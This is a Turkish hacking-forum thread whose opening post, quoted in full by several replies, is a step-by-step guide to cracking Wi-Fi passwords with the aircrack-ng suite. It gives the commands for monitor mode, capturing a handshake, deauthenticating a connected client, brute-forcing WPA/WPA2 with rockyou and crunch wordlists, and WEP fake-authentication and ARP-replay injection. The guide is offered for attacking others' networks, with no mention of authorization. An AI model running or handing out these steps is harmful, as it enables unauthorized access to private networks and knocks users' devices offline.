Network Attacking Types for WPA, WPA2 and WEP

AmIAnon?

Yeni üye
20 Kas 2021
46
34
Atatürk'ün izinde!
5aE7rL.png


5aE7rL.png


Network Attack
Bu attack tipini gerçekleştirmek için bir wifi-card'a ihtiyacımız olacak.
https://www.hepsiburada.com/magbox-...icilari-uyumlu-led-gostergeli-pm-HB00000H840T
Ben bundan kullanıyorum kendisi çoğu saldırıda işe yarıyor.
Wifi-Card'ımızı aldığımıza göre saldırımıza başlayabiliriz
. iyi seyirler. :)



Monitör Moda Geçmek için:
airmon-ng start wlan0

Managed Moda Geçmek için:
airmon-ng stop wlan0mon





Wifi-Card'ımızı monitör moda geçirdiğimize göre artık ağların bilgilerini toplayabiliriz.
iwconfig yazarak da bunu kontrol edebiliriz.




Daha sağlıklı olması açısından görseli internetten bulduğum için bende Mode:Managed olarak gözüküyor sizde Mode:Monitor olarak gözükecektir.



Crack for WPA or WPA2



airodump-ng wlan0mon



Görmüş olduğunuz üzere belli bir uzaklığımızda bulunan tüm wifi ağları terminalimizde gözükmeye başladı.

Belli bir ağa özel bilgi edinmek istiyorsak:
--bssid ve --channel değerlerini girmemiz ve o ağa karşı brute force saldırısı yapacağımız için bir handshake yakalamamız gerekecektir, bunun için --write yazıp .cap dosyamıza bir isim belirlemeliyiz. Komutun sonunda ise interface tanımlamamız yeterli olacaktır.



airodump-ng --bssid 11:22:AB:33:C4:5B --channel 1 --write wcrack wlan0mon



O ağa özel dinleme işlemimiz başladı, Handshake yakalamamız için herhangi birisinin o internete tekrar bağlanması gerekcektir.
Bu işlemi kısaltmak istersek o ağda bulunan herhangi bir cihaza deauthentication (yetkisizlendirme) saldırısı yapabiliriz.



-a: bssid değeri, -c: saldırı yapılacak cihaz --deauth: atılacak paket sayısı
aireplay-ng --deauth 10 -a 11:22:AB:33:C4:5B -c 11:22:33:44:55:66 wlan0mon



Paket atma işlemi tamamlandığında handshake yakalamış olacağız herhangi bir yere kaydetmesini söylemediğimiz için muhtemelen root klasörünün içerisine kaydedildi.
Artık elimizde Handshake dosyamız olduğuna göre şifre kırma işlemini gerçekleştirebiliriz.
Kali linux içerisinde yüklü gelen aircrack-ng aracımızı cap dosyamıza karşı çalıştıracağız.



First Option: (hazır wordlist)
aricrack-ng *handshake dosyamız* -w *çalıştırmak istediğimiz wordlist*

aircrack-ng wcrack-01.cap -w wordlist.txt
aircrack-ng wcrack-01.cap -w fasttrack.txt
aircrack-ng wcrack-01.cap -w rockyou.txt

Second Option: (tahmine dayalı)
Bu seçeneğin ilk seçenekten tek farkı wordlisti kendimiz oluşturacağımızdır.
Bunun için crunch komutunu kullanacağız.
crunch 8 9 123xy -o wpacrunch
*En az 8, en fazla 9 haneli ve içinde 1, 2, 3, x, y barındıran tüm olasılıkları "wpacrunch" adı altına yazdır.*
Wordlistimizi oluşturduğumuza göre artık şifre kırma işlemlerimize geçebiliriz.
aircrack-ng wcrack-01.cap -w wpacrunch
*aircrack-ng aracı aracılığı ile wpacrunch wordlistini handshake dosyasına karşı çalıştır.*
Eğer saldırı yapılan modemin şifresi wordlistlerimiz içerisinde var ise şifreyi kıracak ve ekteki gibi bir çıktı verecektir.



WPA veya WPA2 güvenlikli ağlarımız için crack işlemlerimiz tamamlandı.
Şimdi de günümüzde çok kullanılmasa da WEP güvenlikli ağları kıracağız.



Crack for WEP



Bu işlem için Fake Authentication ile IV üretimi yapmamız gerekcektir.
("WPA, WPA2" için FakeAuth ile "IV" ürettiremeyiz bu sebeple WEP için geçerli.)
(interneti kullanamayız ve herhangi bir parolaya erişemeyiz.)

aireplay-ng --fakeauth 0 -a 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
-h = mac adress

Mac adresinizi öğrenmek istiyorsanız:
ifconfig > wlan0mon periyodunun 2. satırında bulunann unspec kısmından sonraki 6 hane size mac adresinizi verecektir.



...unspec 74-DA-3B-6E-CF-9C-3A-00-00-00...
Mac adresiniz: 74-DA-3B-6E-CF-9C



IV Ürettirmek yani Paket enjeksiyonu yapmak için:
aireplay-ng --arpreplay -b 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
aircrack-ng wcrack-01.cap

*aircrack-ng"yi "wcrack-01.cap"e karşı çalıştır.*





Ek Bilgi:
Herhangi bir wordlisti görmek istiyorsanız:
cat wpacrunch

Şifremiz o wordlist içerisinde yer alıyor mu diye kontrol etmek için:
cat wordlist.txt | grep 123asd

Alternatif Wifi-Card önerileri:

Atheros AR9271
Ralink RT3070
Ralink RT3572
Ralink RT5572
Realtek RTL8812AU
Ralink RT5370N
MediaTek MT7610U


Note: Kendi seçiminizi yapmak istiyorsanız, alacağınız wifi-card'ın monitör mode ve linux uyumlu olmasına,
Packed Injection desteklemesi durumunu kontrol etmelisiniz.




Okuduğunuz için teşekkürler, kendisi benim ilk makalem oldu eksiklerim varsa kusuruma bakmayın. iyi Hacklemeler THT ailesi :)


 
Son düzenleme:

'GHOST

Uzman üye
31 Mar 2022
1,387
568
5aE7rL.png


5aE7rL.png


Network Attack
Bu attack tipini gerçekleştirmek için bir wifi-card'a ihtiyacımız olacak.
Wi-Fi Anten Adaptör 150Mbps Tüm Uydulara Uyumlu Ralink-5370 Chıp Fiyatları ve Özellikleri
Ben bundan kullanıyorum kenidisi çoğu saldırıda işe yarıyor.
Wifi-Card'ımızı aldığımıza göre saldırımıza başlayabiliriz,
iyi seyirler. :)

5aE7rL.png


Monitör Moda Geçmek için:
airmon-ng start wlan0

Managed Moda Geçmek için:
airmon-ng stop wlan0mon

image-11.png


5aE7rL.png


Wifi-Card'ımızı monitör moda geçirdiğimize göre artık ağların bilgilerini toplayabiliriz.
iwconfig yazarak da bunu kontrol edebiliriz.


Aircrack_ng.jpg


Daha sağlıklı olması açısından görseli internetten bulduğum için bende Mode:Managed olarak gözüküyor sizde Mode:Monitor olarak gözükecektir.


5aE7rL.png

Crack for WPA or WPA2
5aE7rL.png


airodump-ng wlan0mon

image-13.png


Görmüş olduğunuz üzere belli bir uzaklığımızda bulunan tüm wifi ağları terminalimizde gözükmeye başladı.

Belli bir ağa özel bilgi edinmek istiyorsak:
--bssid ve --channel değerlerini girmemiz ve o ağa karşı brute force saldırısı yapacağımız için bir handshake yakalamamız gerekecektir, bunun için --write yazıp .cap dosyamıza bir isim belirlemeliyiz. Komutun sonunda ise interface tanımlamamız yeterli olacaktır.

5aE7rL.png


airodump-ng --bssid 11:22:AB:33:C4:5B --channel 1 --write wcrack wlan0mon

20190428153019-803x500.png


O ağa özel dinleme işlemimiz başladı, Handshake yakalamamız için herhangi birisinin o internete tekrar bağlanması gerekcektir.
Bu işlemi kısaltmak istersek o ağda bulunan herhangi bir cihaza deauthentication (yetkisizlendirme) saldırısı yapabiliriz.

5aE7rL.png


-a: bssid değeri, -c: saldırı yapılacak cihaz --deauth: atılacak paket sayısı
aireplay-ng --deauth 10 -a 11:22:AB:33:C4:5B -c 11:22:33:44:55:66 wlan0mon

20190507164045-832x447.png


Paket atma işlemi tamamlandığında handshake yakalamış olacağız herhangi bir yere kaydetmesini söylemediğimiz için muhtemelen root klasörünün içerisine kaydedildi.

Artık elimizde Handshake dosyamız olduğuna göre şifre kırma işlemini gerçekleştirebiliriz. Kali linux içerisinde yüklü gelen aircrack-ng aracımızı cap dosyamıza karşı çalıştıracağız.

5aE7rL.png


First Option: (hazır wordlist)
aricrack-ng *handshake dosyamız* -w *çalıştırmak istediğimiz wordlist*

aircrack-ng wcrack-01.cap -w wordlist.txt
aircrack-ng wcrack-01.cap -w fasttrack.txt
aircrack-ng wcrack-01.cap -w rockyou.txt

Second Option: (tahmine dayalı)
Bu seçeneğin ilk seçenekten tek farkı wordlisti kendimiz oluşturacağımızdır.
Bunun için crunch komutunu kullanacağız.

crunch 8 9 123xy -o wpacrunch
*En az 8, en fazla 9 haneli ve içinde 1, 2, 3, x, y barındıran tüm olasılıkları "wpacrunch" adı altına yazdır.*
Wordlistimizi oluşturduğumuza göre artık şifre kırma işlemlerimize geçebiliriz.

aircrack-ng wcrack-01.cap -w wpacrunch
*aircrack-ng aracı aracılığı ile wpacrunch wordlistini handshake dosyasına karşı çalıştır.*

Eğer saldırı yapılan modemin şifresi wordlistlerimiz içerisinde var ise şifreyi kıracak ve ekteki gibi bir çıktı verecektir.

Aircrack_ng_pwd_crack.jpg


WPA veya WPA2 güvenlikli ağlarımız için crack işlemlerimiz tamamlandı.
Şimdi de günümüzde çok kullanılmasa da WEP güvenlikli ağları kıracağız.


5aE7rL.png

Crack for WEP
5aE7rL.png


Bu işlem için Fake Authentication ile IV üretimi yapmamız gerekcektir.
("WEP" için çünkü "WPA/2" için FakeAuth ile "IV" ürettiremeyiz.)
(interneti kullanamayız ve herhangi bir parolaya erişemeyiz.)

aireplay-ng --fakeauth 0 -a 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon

-h
içerisine mac adresi değerimizi girdik.
Mac adresinizi öğrenmek istiyorsanız:
ifconfig > wlan0mon > unspec'ten sonraki 6 hane size mac adresinizi verecektir.

ifconfig.png


wlan0mon -> unspec 74-DA-3B-6E-CF-9C-3A-00-00-00...
Mac adresiniz: 74-DA-3B-6E-CF-9C

5aE7rL.png


IV Ürettirmek yani Paket enjeksiyonu yapmak için:
aireplay-ng --arpreplay -b 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon

aircrack-ng wcrack-01.cap

*aircrack-ng"yi "wcrack-01.cap"e karşı çalıştır.*

Aircrack_ng_pwd_crack.jpg


5aE7rL.png


Ek Bilgi:
Herhangi bir wordlisti görmek istiyorsanız:
cat wpacrunch

Şifremiz o wordlist içerisinde yer alıyor mu diye kontrol etmek için:
cat wordlist.txt | grep 123asd

5aE7rL.png


Okuduğunuz için teşekkürler, kendisi benim ilk makalem oldu eksiklerim varsa kusuruma bakmayın. iyi Hacklemeler THT ailesi :)

5aE7rL.png


af8mqjc.gif

ruy73v0.jpg
Eline sağlık.
 

w1sd0m

Katılımcı Üye
28 Mar 2020
699
631
𐱃𐰀𐰢𐰴
Eline sağlık kardeşim.
Yapıcı bir öneride bulunmak istiyorum;
Makalelerinde kendi ekran görüntülerini kullan. Adımları önce kendin uygula. İnsanlar, bu saldırının hala uygulanabilir olup olmadığını merak eder. Eski görüntüler bu merakı gidermez.
Hadi kolay gelsin :)
 

AmIAnon?

Yeni üye
20 Kas 2021
46
34
Atatürk'ün izinde!
Eline sağlık kardeşim.
Yapıcı bir öneride bulunmak istiyorum;
Makalelerinde kendi ekran görüntülerini kullan. Adımları önce kendin uygula. İnsanlar, bu saldırının hala uygulanabilir olup olmadığını merak eder. Eski görüntüler bu merakı gidermez.
Hadi kolay gelsin :)
Öncelikle teşekkür ederim doğrusunu söylemek gerekirse kendi ss'lerimi kullanmak çok uğraştırıcı olurdu ve ip adresleri gözükürse daha sağlıklı bir makale olur diye düşündüğüm için böyle bir gereksinim duydum, saldırılar hala çalışıyor o konuda üyelerimizin merakı olmasın buraya da yazalım. :)

Teşekkür ederim :)
 

drkasmot

Üye
17 Tem 2016
137
27
eğerki wifi şifresi o wordlistin içinde yoksa ömrübillah kıramazsınız yani bi tık boş uğraş bu
 

'GHOST

Uzman üye
31 Mar 2022
1,387
568
wi-fi şifreleri eskinden pin ile kırılıyordu ama günümüzde 60 saniyelik kısıtlamadan dolayı pin yakalanamiyor😂
 

highfly

Katılımcı Üye
11 Nis 2021
410
306
gugava nzı HashlendiÇzünBklm
5aE7rL.png


5aE7rL.png


Network Attack
Bu attack tipini gerçekleştirmek için bir wifi-card'a ihtiyacımız olacak.
https://www.hepsiburada.com/magbox-...icilari-uyumlu-led-gostergeli-pm-HB00000H840T
Ben bundan kullanıyorum kendisi çoğu saldırıda işe yarıyor.
Wifi-Card'ımızı aldığımıza göre saldırımıza başlayabiliriz
. iyi seyirler. :)



Monitör Moda Geçmek için:
airmon-ng start wlan0

Managed Moda Geçmek için:
airmon-ng stop wlan0mon





Wifi-Card'ımızı monitör moda geçirdiğimize göre artık ağların bilgilerini toplayabiliriz.
iwconfig yazarak da bunu kontrol edebiliriz.


Daha sağlıklı olması açısından görseli internetten bulduğum için bende Mode:Managed olarak gözüküyor sizde Mode:Monitor olarak gözükecektir.


Crack for WPA or WPA2



airodump-ng wlan0mon



Görmüş olduğunuz üzere belli bir uzaklığımızda bulunan tüm wifi ağları terminalimizde gözükmeye başladı.

Belli bir ağa özel bilgi edinmek istiyorsak:
--bssid ve --channel değerlerini girmemiz ve o ağa karşı brute force saldırısı yapacağımız için bir handshake yakalamamız gerekecektir, bunun için --write yazıp .cap dosyamıza bir isim belirlemeliyiz. Komutun sonunda ise interface tanımlamamız yeterli olacaktır.


airodump-ng --bssid 11:22:AB:33:C4:5B --channel 1 --write wcrack wlan0mon


O ağa özel dinleme işlemimiz başladı, Handshake yakalamamız için herhangi birisinin o internete tekrar bağlanması gerekcektir.
Bu işlemi kısaltmak istersek o ağda bulunan herhangi bir cihaza deauthentication (yetkisizlendirme) saldırısı yapabiliriz.



-a: bssid değeri, -c: saldırı yapılacak cihaz --deauth: atılacak paket sayısı
aireplay-ng --deauth 10 -a 11:22:AB:33:C4:5B -c 11:22:33:44:55:66 wlan0mon



Paket atma işlemi tamamlandığında handshake yakalamış olacağız herhangi bir yere kaydetmesini söylemediğimiz için muhtemelen root klasörünün içerisine kaydedildi.
Artık elimizde Handshake dosyamız olduğuna göre şifre kırma işlemini gerçekleştirebiliriz.
Kali linux içerisinde yüklü gelen aircrack-ng aracımızı cap dosyamıza karşı çalıştıracağız.



First Option: (hazır wordlist)
aricrack-ng *handshake dosyamız* -w *çalıştırmak istediğimiz wordlist*
aircrack-ng wcrack-01.cap -w wordlist.txt
aircrack-ng wcrack-01.cap -w fasttrack.txt
aircrack-ng wcrack-01.cap -w rockyou.txt

Second Option: (tahmine dayalı)
Bu seçeneğin ilk seçenekten tek farkı wordlisti kendimiz oluşturacağımızdır.
Bunun için crunch komutunu kullanacağız.
crunch 8 9 123xy -o wpacrunch
*En az 8, en fazla 9 haneli ve içinde 1, 2, 3, x, y barındıran tüm olasılıkları "wpacrunch" adı altına yazdır.*
Wordlistimizi oluşturduğumuza göre artık şifre kırma işlemlerimize geçebiliriz.
aircrack-ng wcrack-01.cap -w wpacrunch
*aircrack-ng aracı aracılığı ile wpacrunch wordlistini handshake dosyasına karşı çalıştır.*
Eğer saldırı yapılan modemin şifresi wordlistlerimiz içerisinde var ise şifreyi kıracak ve ekteki gibi bir çıktı verecektir.



WPA veya WPA2 güvenlikli ağlarımız için crack işlemlerimiz tamamlandı.
Şimdi de günümüzde çok kullanılmasa da WEP güvenlikli ağları kıracağız.



Crack for WEP



Bu işlem için Fake Authentication ile IV üretimi yapmamız gerekcektir.
("WEP" için çünkü "WPA/2" için FakeAuth ile "IV" ürettiremeyiz.)
(interneti kullanamayız ve herhangi bir parolaya erişemeyiz.)
aireplay-ng --fakeauth 0 -a 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
-h içerisine mac adresi değerimizi girdik.

Mac adresinizi öğrenmek istiyorsanız:
ifconfig > wlan0mon > unspec'ten sonraki 6 hane size mac adresinizi verecektir.



wlan0mon -> unspec 74-DA-3B-6E-CF-9C-3A-00-00-00...
Mac adresiniz: 74-DA-3B-6E-CF-9C



IV Ürettirmek yani Paket enjeksiyonu yapmak için:
aireplay-ng --arpreplay -b 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
aircrack-ng wcrack-01.cap
*aircrack-ng"yi "wcrack-01.cap"e karşı çalıştır.*





Ek Bilgi:
Herhangi bir wordlisti görmek istiyorsanız:
cat wpacrunch
Şifremiz o wordlist içerisinde yer alıyor mu diye kontrol etmek için:
cat wordlist.txt | grep 123asd

Alternatif Wifi-Card önerileri:
Atheros AR9271
Ralink RT3070
Ralink RT3572
Ralink RT5572
Realtek RTL8812AU
Ralink RT5370N
MediaTek MT7610U

Note: Kendi seçiminizi yapmak istiyorsanız, monitör mode ve linux uyumlu olmasına, Packed Injection desteklemesi durumunu kontrol etmelisiniz.



Okuduğunuz için teşekkürler, kendisi benim ilk makalem oldu eksiklerim varsa kusuruma bakmayın. iyi Hacklemeler THT ailesi :)


Eline sağlık knksss
 
13 Nis 2022
179
113
тüяκıчe
5aE7rL.png


5aE7rL.png


Network Attack
Bu attack tipini gerçekleştirmek için bir wifi-card'a ihtiyacımız olacak.
https://www.hepsiburada.com/magbox-...icilari-uyumlu-led-gostergeli-pm-HB00000H840T
Ben bundan kullanıyorum kendisi çoğu saldırıda işe yarıyor.
Wifi-Card'ımızı aldığımıza göre saldırımıza başlayabiliriz
. iyi seyirler. :)



Monitör Moda Geçmek için:
airmon-ng start wlan0

Managed Moda Geçmek için:
airmon-ng stop wlan0mon





Wifi-Card'ımızı monitör moda geçirdiğimize göre artık ağların bilgilerini toplayabiliriz.
iwconfig yazarak da bunu kontrol edebiliriz.




Daha sağlıklı olması açısından görseli internetten bulduğum için bende Mode:Managed olarak gözüküyor sizde Mode:Monitor olarak gözükecektir.



Crack for WPA or WPA2



airodump-ng wlan0mon



Görmüş olduğunuz üzere belli bir uzaklığımızda bulunan tüm wifi ağları terminalimizde gözükmeye başladı.

Belli bir ağa özel bilgi edinmek istiyorsak:
--bssid ve --channel değerlerini girmemiz ve o ağa karşı brute force saldırısı yapacağımız için bir handshake yakalamamız gerekecektir, bunun için --write yazıp .cap dosyamıza bir isim belirlemeliyiz. Komutun sonunda ise interface tanımlamamız yeterli olacaktır.



airodump-ng --bssid 11:22:AB:33:C4:5B --channel 1 --write wcrack wlan0mon



O ağa özel dinleme işlemimiz başladı, Handshake yakalamamız için herhangi birisinin o internete tekrar bağlanması gerekcektir.
Bu işlemi kısaltmak istersek o ağda bulunan herhangi bir cihaza deauthentication (yetkisizlendirme) saldırısı yapabiliriz.



-a: bssid değeri, -c: saldırı yapılacak cihaz --deauth: atılacak paket sayısı
aireplay-ng --deauth 10 -a 11:22:AB:33:C4:5B -c 11:22:33:44:55:66 wlan0mon



Paket atma işlemi tamamlandığında handshake yakalamış olacağız herhangi bir yere kaydetmesini söylemediğimiz için muhtemelen root klasörünün içerisine kaydedildi.
Artık elimizde Handshake dosyamız olduğuna göre şifre kırma işlemini gerçekleştirebiliriz.
Kali linux içerisinde yüklü gelen aircrack-ng aracımızı cap dosyamıza karşı çalıştıracağız.



First Option: (hazır wordlist)
aricrack-ng *handshake dosyamız* -w *çalıştırmak istediğimiz wordlist*

aircrack-ng wcrack-01.cap -w wordlist.txt
aircrack-ng wcrack-01.cap -w fasttrack.txt
aircrack-ng wcrack-01.cap -w rockyou.txt

Second Option: (tahmine dayalı)
Bu seçeneğin ilk seçenekten tek farkı wordlisti kendimiz oluşturacağımızdır.
Bunun için crunch komutunu kullanacağız.
crunch 8 9 123xy -o wpacrunch
*En az 8, en fazla 9 haneli ve içinde 1, 2, 3, x, y barındıran tüm olasılıkları "wpacrunch" adı altına yazdır.*
Wordlistimizi oluşturduğumuza göre artık şifre kırma işlemlerimize geçebiliriz.
aircrack-ng wcrack-01.cap -w wpacrunch
*aircrack-ng aracı aracılığı ile wpacrunch wordlistini handshake dosyasına karşı çalıştır.*
Eğer saldırı yapılan modemin şifresi wordlistlerimiz içerisinde var ise şifreyi kıracak ve ekteki gibi bir çıktı verecektir.



WPA veya WPA2 güvenlikli ağlarımız için crack işlemlerimiz tamamlandı.
Şimdi de günümüzde çok kullanılmasa da WEP güvenlikli ağları kıracağız.



Crack for WEP



Bu işlem için Fake Authentication ile IV üretimi yapmamız gerekcektir.
("WPA, WPA2" için FakeAuth ile "IV" ürettiremeyiz bu sebeple WEP için geçerli.)
(interneti kullanamayız ve herhangi bir parolaya erişemeyiz.)

aireplay-ng --fakeauth 0 -a 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
-h = mac adress

Mac adresinizi öğrenmek istiyorsanız:
ifconfig > wlan0mon periyodunun 2. satırında bulunann unspec kısmından sonraki 6 hane size mac adresinizi verecektir.



...unspec 74-DA-3B-6E-CF-9C-3A-00-00-00...
Mac adresiniz: 74-DA-3B-6E-CF-9C



IV Ürettirmek yani Paket enjeksiyonu yapmak için:
aireplay-ng --arpreplay -b 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
aircrack-ng wcrack-01.cap

*aircrack-ng"yi "wcrack-01.cap"e karşı çalıştır.*





Ek Bilgi:
Herhangi bir wordlisti görmek istiyorsanız:
cat wpacrunch

Şifremiz o wordlist içerisinde yer alıyor mu diye kontrol etmek için:
cat wordlist.txt | grep 123asd

Alternatif Wifi-Card önerileri:

Atheros AR9271
Ralink RT3070
Ralink RT3572
Ralink RT5572
Realtek RTL8812AU
Ralink RT5370N
MediaTek MT7610U


Note: Kendi seçiminizi yapmak istiyorsanız, alacağınız wifi-card'ın monitör mode ve linux uyumlu olmasına,
Packed Injection desteklemesi durumunu kontrol etmelisiniz.




Okuduğunuz için teşekkürler, kendisi benim ilk makalem oldu eksiklerim varsa kusuruma bakmayın. iyi Hacklemeler THT ailesi :)


Ellerinize Sağlık.
 

XLRY5Y8D

Yeni üye
23 Mar 2019
48
10
Orda Burda
5aE7rL.png


5aE7rL.png


Network Attack
Bu attack tipini gerçekleştirmek için bir wifi-card'a ihtiyacımız olacak.
https://www.hepsiburada.com/magbox-...icilari-uyumlu-led-gostergeli-pm-HB00000H840T
Ben bundan kullanıyorum kendisi çoğu saldırıda işe yarıyor.
Wifi-Card'ımızı aldığımıza göre saldırımıza başlayabiliriz
. iyi seyirler. :)



Monitör Moda Geçmek için:
airmon-ng start wlan0

Managed Moda Geçmek için:
airmon-ng stop wlan0mon





Wifi-Card'ımızı monitör moda geçirdiğimize göre artık ağların bilgilerini toplayabiliriz.
iwconfig yazarak da bunu kontrol edebiliriz.




Daha sağlıklı olması açısından görseli internetten bulduğum için bende Mode:Managed olarak gözüküyor sizde Mode:Monitor olarak gözükecektir.



Crack for WPA or WPA2



airodump-ng wlan0mon



Görmüş olduğunuz üzere belli bir uzaklığımızda bulunan tüm wifi ağları terminalimizde gözükmeye başladı.

Belli bir ağa özel bilgi edinmek istiyorsak:
--bssid ve --channel değerlerini girmemiz ve o ağa karşı brute force saldırısı yapacağımız için bir handshake yakalamamız gerekecektir, bunun için --write yazıp .cap dosyamıza bir isim belirlemeliyiz. Komutun sonunda ise interface tanımlamamız yeterli olacaktır.



airodump-ng --bssid 11:22:AB:33:C4:5B --channel 1 --write wcrack wlan0mon



O ağa özel dinleme işlemimiz başladı, Handshake yakalamamız için herhangi birisinin o internete tekrar bağlanması gerekcektir.
Bu işlemi kısaltmak istersek o ağda bulunan herhangi bir cihaza deauthentication (yetkisizlendirme) saldırısı yapabiliriz.



-a: bssid değeri, -c: saldırı yapılacak cihaz --deauth: atılacak paket sayısı
aireplay-ng --deauth 10 -a 11:22:AB:33:C4:5B -c 11:22:33:44:55:66 wlan0mon



Paket atma işlemi tamamlandığında handshake yakalamış olacağız herhangi bir yere kaydetmesini söylemediğimiz için muhtemelen root klasörünün içerisine kaydedildi.
Artık elimizde Handshake dosyamız olduğuna göre şifre kırma işlemini gerçekleştirebiliriz.
Kali linux içerisinde yüklü gelen aircrack-ng aracımızı cap dosyamıza karşı çalıştıracağız.



First Option: (hazır wordlist)
aricrack-ng *handshake dosyamız* -w *çalıştırmak istediğimiz wordlist*

aircrack-ng wcrack-01.cap -w wordlist.txt
aircrack-ng wcrack-01.cap -w fasttrack.txt
aircrack-ng wcrack-01.cap -w rockyou.txt

Second Option: (tahmine dayalı)
Bu seçeneğin ilk seçenekten tek farkı wordlisti kendimiz oluşturacağımızdır.
Bunun için crunch komutunu kullanacağız.
crunch 8 9 123xy -o wpacrunch
*En az 8, en fazla 9 haneli ve içinde 1, 2, 3, x, y barındıran tüm olasılıkları "wpacrunch" adı altına yazdır.*
Wordlistimizi oluşturduğumuza göre artık şifre kırma işlemlerimize geçebiliriz.
aircrack-ng wcrack-01.cap -w wpacrunch
*aircrack-ng aracı aracılığı ile wpacrunch wordlistini handshake dosyasına karşı çalıştır.*
Eğer saldırı yapılan modemin şifresi wordlistlerimiz içerisinde var ise şifreyi kıracak ve ekteki gibi bir çıktı verecektir.



WPA veya WPA2 güvenlikli ağlarımız için crack işlemlerimiz tamamlandı.
Şimdi de günümüzde çok kullanılmasa da WEP güvenlikli ağları kıracağız.



Crack for WEP



Bu işlem için Fake Authentication ile IV üretimi yapmamız gerekcektir.
("WPA, WPA2" için FakeAuth ile "IV" ürettiremeyiz bu sebeple WEP için geçerli.)
(interneti kullanamayız ve herhangi bir parolaya erişemeyiz.)

aireplay-ng --fakeauth 0 -a 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
-h = mac adress

Mac adresinizi öğrenmek istiyorsanız:
ifconfig > wlan0mon periyodunun 2. satırında bulunann unspec kısmından sonraki 6 hane size mac adresinizi verecektir.



...unspec 74-DA-3B-6E-CF-9C-3A-00-00-00...
Mac adresiniz: 74-DA-3B-6E-CF-9C



IV Ürettirmek yani Paket enjeksiyonu yapmak için:
aireplay-ng --arpreplay -b 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
aircrack-ng wcrack-01.cap

*aircrack-ng"yi "wcrack-01.cap"e karşı çalıştır.*





Ek Bilgi:
Herhangi bir wordlisti görmek istiyorsanız:
cat wpacrunch

Şifremiz o wordlist içerisinde yer alıyor mu diye kontrol etmek için:
cat wordlist.txt | grep 123asd

Alternatif Wifi-Card önerileri:

Atheros AR9271
Ralink RT3070
Ralink RT3572
Ralink RT5572
Realtek RTL8812AU
Ralink RT5370N
MediaTek MT7610U


Note: Kendi seçiminizi yapmak istiyorsanız, alacağınız wifi-card'ın monitör mode ve linux uyumlu olmasına,
Packed Injection desteklemesi durumunu kontrol etmelisiniz.




Okuduğunuz için teşekkürler, kendisi benim ilk makalem oldu eksiklerim varsa kusuruma bakmayın. iyi Hacklemeler THT ailesi :)


Eline sağlık kardeşim ; Ben Wi-fi hack yaparken genelikle "wifite" aracını kullanıyorum içindeki wordlisti düzenledikten sonra atağa başlıyorum ama bu da on numara taktire şayan bir çalışma olmuş tebrikler. (y)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.